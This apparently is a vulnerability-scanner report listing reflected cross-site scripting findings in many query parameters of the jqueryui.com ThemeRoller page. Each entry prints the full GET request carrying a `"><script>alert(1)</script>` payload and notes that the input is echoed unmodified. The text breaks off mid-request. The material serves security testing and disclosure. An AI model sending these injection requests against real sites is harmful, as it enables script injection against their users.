GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*7d33e"><script>alert(1)</script>d4448f15dc2 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:54:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38c39"><script>alert(1)</script>60cd583f00d was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC38c39"><script>alert(1)</script>60cd583f00d&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:34 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5dc0"><script>alert(1)</script>24ffebe8c1a was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666a5dc0"><script>alert(1)</script>24ffebe8c1a&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:39 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dedb6"><script>alert(1)</script>f1dea2bcac was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFFdedb6"><script>alert(1)</script>f1dea2bcac&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:46 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120319
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88db2"><script>alert(1)</script>4192bd9f2a0 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B1000088db2"><script>alert(1)</script>4192bd9f2a0&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:53:55 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120322
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 316fc"><script>alert(1)</script>934e76f5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF316fc"><script>alert(1)</script>934e76f5e&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 20 Nov 2010 16:52:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120316
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9b5e"><script>alert(1)</script>d56abac4e9f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333f9b5e"><script>alert(1)</script>d56abac4e9f&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5c4d"><script>alert(1)</script>6643b1f4f9e was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFFf5c4d"><script>alert(1)</script>6643b1f4f9e&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:54 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72e03"><script>alert(1)</script>652973ad3a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif72e03"><script>alert(1)</script>652973ad3a&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:22 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120319
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51e1d"><script>alert(1)</script>b18d92c30eb was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%51e1d"><script>alert(1)</script>b18d92c30eb&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:24 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120320
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e74"><script>alert(1)</script>2a56f0acf06 was submitted in the fwDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bolde4e74"><script>alert(1)</script>2a56f0acf06&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:52:23 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120257
The value of the iconColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f91a5"><script>alert(1)</script>c8880d7a410 was submitted in the iconColorActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=666666&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CCf91a5"><script>alert(1)</script>c8880d7a410&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//* HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sat, 20 Nov 2010 16:53:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120322
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73e9d"><script>alert(1)</script>ab4376d587b was submitted in the iconColorContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Lucida%20Grande,%20Lucida%20Sans%20Unicode,%20Arial,%20Verdana,%20sans-serif&fwDefault=bold&fsDefault=100%&cornerRadius=7px&bgColorHeader=55BBDD&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=20&borderColorHeader=55BBDD&fcHeader=FFFFFF&iconColorHeader=FFFFFF&bgColorContent=FFFFFF&bgTextureContent=01_flat.png&bgImgOpacityContent=100&borderColorContent=CCCCCC&fcContent=666666&iconColorContent=66666673e9d"><script>alert(1)</script>ab4376d587b&bgColorDefault=00AAFF&bgTextureDefault=03_highlight_soft.png&bgImgOpacityDefault=50&borderColorDefault=00AAFF&fcDefault=FFFFFF&iconColorDefault=FFFFFF&bgColorHover=00B3FF&bgTextureHover=03_highlight_soft.png&bgImgOpacityHover=50&borderColorHover=00B3FF&fcHover=FFFFFF&iconColorHover=FFFFFF&bgColorActive=F8F8F8&bgTextureActive=06_inset_hard.png&bgImgOpacityActive=100&borderColorActive=CCCCCC&fcActive=0055CC&iconColorActive=0055CC&bgColorHighlight=FFEC7C&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=20&borderColorHighlight=F4D936&fcHighlight=333333&iconColorHighlight=B10000&bgColorError=FFFFFF&bgTextureError=01_flat.png&bgImgOpacityError=100&borderColorError=B10000&fcError=B10000&iconColorError=B10000&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgC